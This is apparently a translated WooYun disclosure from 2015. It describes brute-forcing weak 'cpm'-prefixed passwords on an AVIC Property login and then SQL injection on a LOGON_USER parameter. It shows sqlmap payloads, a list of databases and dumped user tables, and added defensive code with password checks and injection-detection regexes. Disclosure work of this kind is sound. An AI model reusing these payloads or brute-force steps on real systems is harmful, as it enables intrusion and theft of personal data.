
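Vulnerability summary (24 followers)

Vulnerability ID: wooyun-2015-0157711

Title: Weak password / SQL injection in a system of 中航物业 (AVIC Property)

Vendor: 中航物业

Author: 心云

Submitted: 2015-12-03 22:06

Fixed: 2016-01-22 11:14

Published: 2016-01-22 11:14

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (广东省信息安全测评中心, Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]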



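Vulnerability details

Disclosure status:

2015-12-03: details reported to the vendor, awaiting vendor handling
2015-12-08: vendor confirmed; details disclosed to the vendor only
2015-12-18: details disclosed to core white hats and experts in related fields
2015-12-28: details disclosed to regular white hats
2016-01-07: details disclosed to intern white hats
2016-01-22: details disclosed to the public

Brief description:

RT (see title)

Detailed description: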

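中航物业管理有限公司 (AVIC Property Management Co., Ltd.) is a well-known Shenzhen brand. It won the first District Mayor Quality Award of Futian District, Shenzhen, in 2007 and was listed for the Shenzhen Mayor Quality Award in 2013. 中航物业 is also a member company of 中航国际 (AVIC International), a wholly owned subsidiary of 中航地产 (stock code 000043), one of the first enterprises in China's property management industry to hold the national Grade 1 qualification, a vice-president unit of the China Property Management Association, and a vice-president unit of the Shenzhen Property Management Association. With the vision of becoming China's largest integrated property services provider for institutions, it has ranked near the top of the national property management industry for many consecutive years, and its brand value exceeds 500 million.
0X01 Weak passwords
Vulnerable URL: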

http://**.**.**.**/login/Default.aspx


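The login page shows a very interesting hint:
some people's passwords were too simple, so log in with "cpm" added in front of the password.

[Screenshot: the login hint]


In that case, I brute-forced with the top 500, password cpm123456.
Sure enough, several accounts turned up:

[Screenshot: several users found]


But for some reason I could not log in here with Google Chrome.
After switching to Firefox, only one of them worked; I don't know why.

[Screenshot: successful login]


Mail:

[Screenshot: mail]


Company address book:

[Screenshot: address book]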
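
The "cpm" prefix described above is public knowledge (the login page announces it), so it adds nothing to password strength. One way to enforce that at password-change time, as an added example that is not part of the original report: the denylist contents, the minimum length and the function names are assumptions made for illustration.

```python
# Constructed sample denylist; a real deployment would load a large
# breached-password corpus instead.
COMMON_PASSWORDS = {"123456", "12345678", "password", "111111", "000000", "abc123"}

# Affixes an attacker already knows. The login page in this report announces "cpm".
KNOWN_AFFIXES = ("cpm",)

MIN_CORE_LENGTH = 10  # assumed policy value, not taken from the report


def strip_known_affixes(password, affixes=KNOWN_AFFIXES):
    """Repeatedly remove publicly known prefixes and suffixes, ignoring case."""
    core = password
    stripped = True
    while stripped and core:
        stripped = False
        lowered = core.lower()
        for affix in affixes:
            if lowered.startswith(affix):
                core, stripped = core[len(affix):], True
                break
            if lowered.endswith(affix):
                core, stripped = core[:-len(affix)], True
                break
    return core


def rejection_reason(password, username=""):
    """Return why a new password is refused, or None if it passes."""
    core = strip_known_affixes(password)
    lowered = core.lower()
    if lowered in COMMON_PASSWORDS:
        return "common password once known affixes are removed"
    if username and username.lower() in lowered:
        return "contains the username"
    if len(core) < MIN_CORE_LENGTH:
        return "too short once known affixes are removed"
    return None


if __name__ == "__main__":
    for candidate in ("cpm123456", "CPMcpmPassword", "cpmT7#vq9Lm2xWp"):
        print(candidate, "->", rejection_reason(candidate))
```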


0X02 SQL injection
After logging in, I found an injection just by looking around.
Vulnerable URL:

http://**.**.**.**/atd/main.asp?LOGON_USER=liuqiang


A single quote triggers an error:

[Screenshot: error on single quote]


[17:29:46] [INFO] GET parameter 'LOGON_USER' is 'Generic UNION query (NULL) - 1 to 20 col
GET parameter 'LOGON_USER' is vulnerable. Do you want to keep testing the others (if any)
sqlmap identified the following injection point(s) with a total of 216 HTTP(s) requests:
---
Parameter: LOGON_USER (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LOGON_USER=liuqiang' AND 3814=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(9
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LOGON_USER=liuqiang';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: LOGON_USER=liuqiang' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: LOGON_USER=liuqiang' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
+CHAR(121)+CHAR(82)+CHAR(105)+CHAR(97)+CHAR(110)+CHAR(108)+CHAR(107)+CHAR(111)+CHAR(82)+C
---
[17:29:46] [INFO] testing Microsoft SQL Server
[17:29:46] [INFO] confirming Microsoft SQL Server
[17:29:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[17:29:50] [INFO] fetching database names
[17:29:50] [INFO] the SQL query used returns 23 entries
[17:29:50] [INFO] retrieved: atendence
[17:29:50] [INFO] retrieved: caiwu-flow
[17:29:50] [INFO] retrieved: cpmcrm
[17:29:50] [INFO] retrieved: cpmdata
[17:29:50] [INFO] retrieved: cpmeq
[17:29:50] [INFO] retrieved: cpmoa_workflow
[17:29:50] [INFO] retrieved: cpmoa_workflow
[17:29:51] [INFO] retrieved: cpmpackage
[17:29:51] [INFO] retrieved: drm
[17:29:51] [INFO] retrieved: engineering
[17:29:51] [INFO] retrieved: HKDA_CPM_DA
[17:29:51] [INFO] retrieved: master
[17:29:51] [INFO] retrieved: model
[17:29:51] [INFO] retrieved: msdb
[17:29:51] [INFO] retrieved: nanshan_flow
[17:29:51] [INFO] retrieved: Omisguilin
[17:29:51] [INFO] retrieved: OmisNCandXM
[17:29:51] [INFO] retrieved: ReportServer
[17:29:52] [INFO] retrieved: ReportServerTempDB
[17:29:52] [INFO] retrieved: tempdb
[17:29:52] [INFO] retrieved: web
[17:29:52] [INFO] retrieved: webTest
[17:29:52] [INFO] retrieved: ZhongHang
available databases [22]:
[*] atendence
[*] caiwu-flow
[*] cpmcrm
[*] cpmdata
[*] cpmeq
[*] cpmoa_workflow
[*] cpmpackage
[*] drm
[*] engineering
[*] HKDA_CPM_DA
[*] master
[*] model
[*] msdb
[*] nanshan_flow
[*] Omisguilin
[*] OmisNCandXM
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] webTest
[*] ZhongHang


It turns out it is the sa user, and the current user is DBA:

[Screenshot: sa, DBA, 22 databases]


There are quite a lot of tables:

Proof of vulnerability:

people1:

[Screenshot: people1]


jobuser:

[Screenshot: jobuser, 18W (180,000)]


Remediation:

You are the professionals.
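
The four techniques sqlmap reported for LOGON_USER (error-based, stacked queries, time-based blind, UNION query) leave recognizable traces in web server logs. One way to look for them, as an added example that is not part of the original report: the W3C field layout, the allowlist for login names and every log line below are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (documentation IP ranges, invented timestamps).
# The query strings mirror the payload shapes in the sqlmap output above.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-12-01 09:00:01 GET /atd/main.asp LOGON_USER=liuqiang 192.0.2.10 200
2015-12-01 09:00:02 GET /atd/main.asp LOGON_USER=liuqiang%27 198.51.100.7 500
2015-12-01 09:00:03 GET /atd/main.asp logon_user=liuqiang%27;WAITFOR+DELAY+%270:0:5%27-- 198.51.100.7 200
2015-12-01 09:00:08 GET /atd/main.asp LOGON_USER=liuqiang%27+WAITFOR+DELAY+%270:0:5%27-- 198.51.100.7 200
2015-12-01 09:00:13 GET /atd/main.asp LOGON_USER=liuqiang%27+AND+3814=CONVERT(INT,(SELECT+CHAR(113)%2BCHAR(120))) 198.51.100.7 500
2015-12-01 09:00:14 GET /atd/main.asp LOGON_USER=liuqiang%27+UNION+ALL+SELECT+NULL,NULL,NULL-- 198.51.100.7 200
"""

# Assumed allowlist for a login name; any other value in this parameter is suspect.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._-]{1,64}")

# One signature per technique sqlmap reported for SQL Server, plus CHAR() chains.
SIGNATURES = [
    ("stacked-query", re.compile(
        r";\s*(?:waitfor|exec|declare|select|insert|update|delete|drop)\b", re.I)),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("error-convert", re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("char-concat", re.compile(r"(?:\bchar\(\d+\)\s*\+\s*)+char\(\d+\)", re.I)),
]


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split(" ")
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))


def query_params(raw_query):
    """Decode cs-uri-query; names are lower-cased because ASP ignores their case."""
    params = {}
    if raw_query in ("", "-"):
        return params
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name).lower()] = unquote_plus(value)
    return params


def classify(value):
    """Return the tags of every signature that matches the decoded value."""
    return [tag for tag, pattern in SIGNATURES if pattern.search(value)]


def scan(text, param="LOGON_USER"):
    """Report requests whose value for `param` fails the allowlist."""
    findings = []
    for record in parse_w3c(text):
        value = query_params(record["cs-uri-query"]).get(param.lower())
        if value is None or SAFE_VALUE.fullmatch(value):
            continue
        findings.append({
            "time": record["date"] + " " + record["time"],
            "client": record["c-ip"],
            "status": record["sc-status"],
            "tags": classify(value) or ["allowlist-violation"],
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The allowlist check does the real work here: the bare single-quote probe matches no signature but is still reported, so the signatures only label what kind of probing was seen.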

Copyright notice: when reposting, please credit the source 心云@乌云 (WooYun)


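Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-08 14:43

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the organization that manages the site to handle it.

Latest status:

None yet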